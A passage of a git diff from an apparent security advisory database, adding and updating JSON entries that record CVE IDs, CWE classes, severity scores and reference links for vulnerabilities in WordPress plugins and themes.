advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h94h-v9gq-74g7/GHSA-h94h-v9gq-74g7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hx9h-rh37-jg32/GHSA-hx9h-rh37-jg32.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j368-q2mr-vhv4/GHSA-j368-q2mr-vhv4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j3pj-q5qg-g2r8/GHSA-j3pj-q5qg-g2r8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j4g8-p5xf-cx8j/GHSA-j4g8-p5xf-cx8j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jcgh-3xqc-4hgp/GHSA-jcgh-3xqc-4hgp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jf9p-r93v-rw24/GHSA-jf9p-r93v-rw24.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jhr5-g8vv-6x3q/GHSA-jhr5-g8vv-6x3q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jjpv-2mhh-mcmm/GHSA-jjpv-2mhh-mcmm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jvrv-rj6m-mfm6/GHSA-jvrv-rj6m-mfm6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jw2x-9qxr-2w9w/GHSA-jw2x-9qxr-2w9w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m69x-7wp8-6gjv/GHSA-m69x-7wp8-6gjv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mgwj-pxgv-5r8r/GHSA-mgwj-pxgv-5r8r.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-mhqr-8rx2-jw82/GHSA-mhqr-8rx2-jw82.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mj24-8cx9-5wc8/GHSA-mj24-8cx9-5wc8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mj7j-8qcf-454p/GHSA-mj7j-8qcf-454p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mrcv-7mr4-vfm5/GHSA-mrcv-7mr4-vfm5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mrp6-8q86-qp29/GHSA-mrp6-8q86-qp29.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mvfm-p427-8c26/GHSA-mvfm-p427-8c26.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mwrf-hg69-6h5g/GHSA-mwrf-hg69-6h5g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p2m5-3j38-g6mj/GHSA-p2m5-3j38-g6mj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p2vq-xhgq-wqqr/GHSA-p2vq-xhgq-wqqr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p3w5-jrj2-m9r6/GHSA-p3w5-jrj2-m9r6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json 
diff --git a/advisories/unreviewed/2025/06/GHSA-h2w9-p5qf-qmrh/GHSA-h2w9-p5qf-qmrh.json b/advisories/unreviewed/2025/06/GHSA-h2w9-p5qf-qmrh/GHSA-h2w9-p5qf-qmrh.json
index b7c2fdc3a1409..5739901dcf42b 100644
--- a/advisories/unreviewed/2025/06/GHSA-h2w9-p5qf-qmrh/GHSA-h2w9-p5qf-qmrh.json
+++ b/advisories/unreviewed/2025/06/GHSA-h2w9-p5qf-qmrh/GHSA-h2w9-p5qf-qmrh.json
@@ -30,6 +30,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-74",
 "CWE-77"
 ],
 "severity": "CRITICAL",
diff --git a/advisories/unreviewed/2025/07/GHSA-mj4r-rpwm-gg33/GHSA-mj4r-rpwm-gg33.json b/advisories/unreviewed/2025/07/GHSA-mj4r-rpwm-gg33/GHSA-mj4r-rpwm-gg33.json
index 0cfe119e9f720..ecdd2a1407a28 100644
--- a/advisories/unreviewed/2025/07/GHSA-mj4r-rpwm-gg33/GHSA-mj4r-rpwm-gg33.json
+++ b/advisories/unreviewed/2025/07/GHSA-mj4r-rpwm-gg33/GHSA-mj4r-rpwm-gg33.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mj4r-rpwm-gg33",
- "modified": "2025-10-22T00:33:19Z",
+ "modified": "2026-02-20T18:31:24Z",
 "published": "2025-07-17T18:31:13Z",
 "aliases": [
 "CVE-2025-25257"
@@ -27,9 +27,17 @@
 "type": "WEB",
 "url": "https://github.com/0xbigshaq/CVE-2025-25257"
 },
+ {
+ "type": "WEB",
+ "url": "https://packetstorm.news/files/id/210193"
+ },
 {
 "type": "WEB",
 "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-25257"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/52473"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2025/12/GHSA-7365-jmqc-qf8w/GHSA-7365-jmqc-qf8w.json b/advisories/unreviewed/2025/12/GHSA-7365-jmqc-qf8w/GHSA-7365-jmqc-qf8w.json
index ca3e5efac004d..759a71fdebf05 100644
--- a/advisories/unreviewed/2025/12/GHSA-7365-jmqc-qf8w/GHSA-7365-jmqc-qf8w.json
+++ b/advisories/unreviewed/2025/12/GHSA-7365-jmqc-qf8w/GHSA-7365-jmqc-qf8w.json
@@ -26,7 +26,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-290"
+ "CWE-290",
+ "CWE-451"
 ],
 "severity": "LOW",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2026/02/GHSA-23vm-r6m3-8q9g/GHSA-23vm-r6m3-8q9g.json b/advisories/unreviewed/2026/02/GHSA-23vm-r6m3-8q9g/GHSA-23vm-r6m3-8q9g.json
new file mode 100644
index 0000000000000..bab79c16a8bb7
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-23vm-r6m3-8q9g/GHSA-23vm-r6m3-8q9g.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-23vm-r6m3-8q9g",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22350"
+ ],
+ "details": "Missing Authorization vulnerability in add-ons.org PDF for Elementor Forms + Drag And Drop Template Builder pdf-for-elementor-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through <= 6.3.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22350"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/pdf-for-elementor-forms/vulnerability/wordpress-pdf-for-elementor-forms-drag-and-drop-template-builder-plugin-6-3-1-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:33Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-256m-r39j-gmcw/GHSA-256m-r39j-gmcw.json b/advisories/unreviewed/2026/02/GHSA-256m-r39j-gmcw/GHSA-256m-r39j-gmcw.json
new file mode 100644
index 0000000000000..a7631a90657e5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-256m-r39j-gmcw/GHSA-256m-r39j-gmcw.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-256m-r39j-gmcw",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69304"
+ ],
+ "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Allmart allmart-core allows Blind SQL Injection.This issue affects Allmart: from n/a through <= 1.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69304"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/allmart-core/vulnerability/wordpress-allmart-plugin-1-1-sql-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json b/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json
new file mode 100644
index 0000000000000..936fd65d0151c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-279c-6crv-5wxc",
+ "modified": "2026-02-20T18:31:37Z",
+ "published": "2026-02-20T18:31:37Z",
+ "aliases": [
+ "CVE-2025-69390"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themebon Business Template Blocks for WPBakery (Visual Composer) Page Builder templates-and-addons-for-wpbakery-page-builder allows Reflected XSS.This issue affects Business Template Blocks for WPBakery (Visual Composer) Page Builder: from n/a through <= 1.3.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69390"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/templates-and-addons-for-wpbakery-page-builder/vulnerability/wordpress-business-template-blocks-for-wpbakery-visual-composer-page-builder-plugin-1-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:24Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-27v4-jx99-gfh6/GHSA-27v4-jx99-gfh6.json b/advisories/unreviewed/2026/02/GHSA-27v4-jx99-gfh6/GHSA-27v4-jx99-gfh6.json
index 1cd31c4a54fca..6a39fb3641362 100644
--- a/advisories/unreviewed/2026/02/GHSA-27v4-jx99-gfh6/GHSA-27v4-jx99-gfh6.json
+++ b/advisories/unreviewed/2026/02/GHSA-27v4-jx99-gfh6/GHSA-27v4-jx99-gfh6.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-27v4-jx99-gfh6",
- "modified": "2026-02-19T21:30:48Z",
+ "modified": "2026-02-20T18:31:32Z",
 "published": "2026-02-19T21:30:48Z",
 "aliases": [
 "CVE-2026-27360"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 10Web Photo Gallery by 10Web photo-gallery allows Stored XSS.This issue affects Photo Gallery by 10Web: from n/a through <= 1.8.37.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T21:18:32Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-28ww-g7m4-w94r/GHSA-28ww-g7m4-w94r.json b/advisories/unreviewed/2026/02/GHSA-28ww-g7m4-w94r/GHSA-28ww-g7m4-w94r.json
new file mode 100644
index 0000000000000..78b4409856a12
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-28ww-g7m4-w94r/GHSA-28ww-g7m4-w94r.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-28ww-g7m4-w94r",
+ "modified": "2026-02-20T18:31:33Z",
+ "published": "2026-02-20T18:31:33Z",
+ "aliases": [
+ "CVE-2025-60183"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in silence Silencesoft RSS Reader external-rss-reader allows Stored XSS.This issue affects Silencesoft RSS Reader: from n/a through <= 0.6.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60183"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/external-rss-reader/vulnerability/wordpress-silencesoft-rss-reader-plugin-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-29xg-2j5g-mj8g/GHSA-29xg-2j5g-mj8g.json b/advisories/unreviewed/2026/02/GHSA-29xg-2j5g-mj8g/GHSA-29xg-2j5g-mj8g.json
new file mode 100644
index 0000000000000..f09cb0995facc
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-29xg-2j5g-mj8g/GHSA-29xg-2j5g-mj8g.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-29xg-2j5g-mj8g",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68531"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in modeltheme ModelTheme Addons for WPBakery and Elementor modeltheme-addons-for-wpbakery allows Object Injection.This issue affects ModelTheme Addons for WPBakery and Elementor: from n/a through < 1.5.6.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68531"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/modeltheme-addons-for-wpbakery/vulnerability/wordpress-modeltheme-addons-for-wpbakery-and-elementor-plugin-1-5-6-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2c3x-rrq4-j7xg/GHSA-2c3x-rrq4-j7xg.json b/advisories/unreviewed/2026/02/GHSA-2c3x-rrq4-j7xg/GHSA-2c3x-rrq4-j7xg.json
new file mode 100644
index 0000000000000..8a7447261405a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2c3x-rrq4-j7xg/GHSA-2c3x-rrq4-j7xg.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2c3x-rrq4-j7xg",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22369"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Ironfit ironfit allows PHP Local File Inclusion.This issue affects Ironfit: from n/a through <= 1.5.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22369"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/ironfit/vulnerability/wordpress-ironfit-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2cpq-4q56-fghm/GHSA-2cpq-4q56-fghm.json b/advisories/unreviewed/2026/02/GHSA-2cpq-4q56-fghm/GHSA-2cpq-4q56-fghm.json
index 8886e79c92150..132f4d496f408 100644
--- a/advisories/unreviewed/2026/02/GHSA-2cpq-4q56-fghm/GHSA-2cpq-4q56-fghm.json
+++ b/advisories/unreviewed/2026/02/GHSA-2cpq-4q56-fghm/GHSA-2cpq-4q56-fghm.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2cpq-4q56-fghm",
- "modified": "2026-02-19T18:31:53Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:53Z",
 "aliases": [
 "CVE-2026-25472"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeFusion Fusion Builder fusion-builder allows Stored XSS.This issue affects Fusion Builder: from n/a through <= 3.14.3.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
